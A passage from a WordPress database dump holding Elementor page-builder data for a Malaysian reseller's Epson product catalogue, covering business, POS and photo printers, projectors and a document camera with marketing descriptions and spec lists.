src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7720,3446,'_elementor_version','0.4'),(7723,3447,'_wp_page_template','template-fullwidth.php'),(7724,3447,'_elementor_edit_mode','builder'),(7725,3447,'_elementor_template_type','post'),(7726,3447,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce 